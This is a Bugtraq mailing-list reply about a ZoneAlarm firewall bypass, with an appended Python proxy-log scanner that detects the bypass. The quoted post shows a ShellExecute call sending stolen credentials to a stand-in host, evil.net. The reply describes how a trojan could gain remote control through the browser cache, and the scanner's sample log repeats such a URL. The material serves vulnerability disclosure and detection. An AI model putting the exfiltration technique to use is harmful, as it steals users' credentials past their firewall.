Re: Bypassing ZoneAlarm (limited)

From: Dan Harkless (bugtraqat_private)
Date: Thu Jul 03 2003 - 11:57:27 PDT


    While I was being interviewed for an InfoSecurityMag.com article on this (in
    which the author unfortunately got multiple fundamental facts wrong), I
    thought of a couple of other points that are probably worth mentioning.
    
    <acehat_private> writes:
    > Windows dll shell32.dll exports a well known and documented function called
    > ShellExecute. From Win32 Programmer's reference:
    > 
    > >HINSTANCE ShellExecute(
    > >  HWND hwnd,              // handle to parent window
    > >  LPCTSTR lpOperation,    // pointer to string that specifies
    > >                          // operation to perform
    > >  LPCTSTR lpFile,         // pointer to filename or folder name string
    > >  LPCTSTR lpParameters,   // pointer to string that specifies
    > >                          // executable-file parameters
    > >  LPCTSTR lpDirectory,    // pointer to string that specifies default
    > >                          // directory
    > >  INT nShowCmd            // whether file is shown when opened
    > >  );
    > 
    > When the lpFile parameter is an Internet url, windows invokes Internet 
    > Explorer (or more accurately - the default web browser), which in 99% of 
    > the cases is allowed to access Internet, with that url. Example:
    > 
    > ShellExecute(
    >   0,
    >   "open",
    >   "http://evil.net/collect.cgi?un=stolen_username&pw=stolen_password",
    >   0,
    >   0,
    >   SW_HIDE //This doesn't work.
    >           //I think it is supposed to hide the window but ...
    >   );
    
    The level of detail you're going into on ShellExecute() kind of implies the
    vulnerability is limited to that one system call, but of course a malicious
    executable could directly run iexplore.exe or any other executable that
    allows opening arbitrary URLs, and pass those URLs via the commandline or
    via other means like DDE.
    
    > The info leaked is limited by the maximum allowed url length, but that 
    > could be more than enough for a malicious application to send some 
    > username/password/cookie/cc_number info to malicious server.
    
    And the vulnerability wouldn't be limited to simplex communications from
    host to server.  The trojan could employ techniques (as simple as reading
    Internet Explorer cache files) to establish half-duplex communications,
    potentially allowing an attacker to gain remote control over your machine
    despite the presence of ZoneAlarm.
    
    Of course if a trojan is able to run arbitrary commands with your user
    privileges (especially if you're in the Administrators group, as, for
    instance, the initial account created on Windows XP boxes is), there are
    other ways an attacker could gain control of your machine.  Particularly if
    you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
    doesn't notice DLLs getting changed.
    
    --
    Dan Harkless
    bugtraqat_private
    http://harkless.org/dan/
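The exfiltration channel discussed in this thread leaves a trace that a personal firewall misses but a proxy or gateway log does not: a browser GET whose query string carries credential-like keys or is unusually long. The scanner below is an added example, not code from the original post or from ZoneAlarm; the log line format, the key list and the length threshold are assumptions, and the log lines are constructed.

```python
"""Flag outbound URLs that look like secrets smuggled through a browser
launched by a local process (the ShellExecute/URL channel discussed above).
Added example; log format, key list and threshold are assumptions."""
from urllib.parse import urlsplit, parse_qsl

# Query keys commonly used to carry secrets in a URL (assumed list).
SENSITIVE_KEYS = {"un", "user", "username", "pw", "pass", "passwd",
                  "password", "cookie", "cc", "cc_number", "card", "token"}
MAX_QUERY_LEN = 256  # assumed threshold; ordinary GET queries are short


def suspicious_url(url):
    """Return the reasons a URL looks like exfiltration, [] if it looks clean."""
    parts = urlsplit(url)
    reasons = []
    if not parts.query:
        return reasons
    keys = {k.lower() for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
    hits = sorted(keys & SENSITIVE_KEYS)
    if hits:
        reasons.append("sensitive query keys: " + ",".join(hits))
    if len(parts.query) > MAX_QUERY_LEN:
        reasons.append(f"query length {len(parts.query)} > {MAX_QUERY_LEN}")
    return reasons


def scan_proxy_log(lines):
    """Parse 'timestamp client method url' lines (assumed format);
    return a list of (url, reasons) for every flagged GET."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4 or fields[2] != "GET":
            continue
        reasons = suspicious_url(fields[3])
        if reasons:
            flagged.append((fields[3], reasons))
    return flagged


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    "2003-07-03T11:57:27 10.0.0.5 GET http://example.com/index.html",
    "2003-07-03T11:57:29 10.0.0.5 GET http://example.com/search?q=firewall+review",
    "2003-07-03T11:57:31 10.0.0.5 GET http://evil.example/collect.cgi?un=alice&pw=hunter2",
    "2003-07-03T11:57:33 10.0.0.5 GET http://cdn.example/t?d=" + "A" * 300,
]

if __name__ == "__main__":
    for url, reasons in scan_proxy_log(SAMPLE_LOG):
        print(url, "->", "; ".join(reasons))
```

The length check catches the half-duplex variant Dan describes as well, since a trojan that polls a server through the browser still has to encode its data into the request line.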
    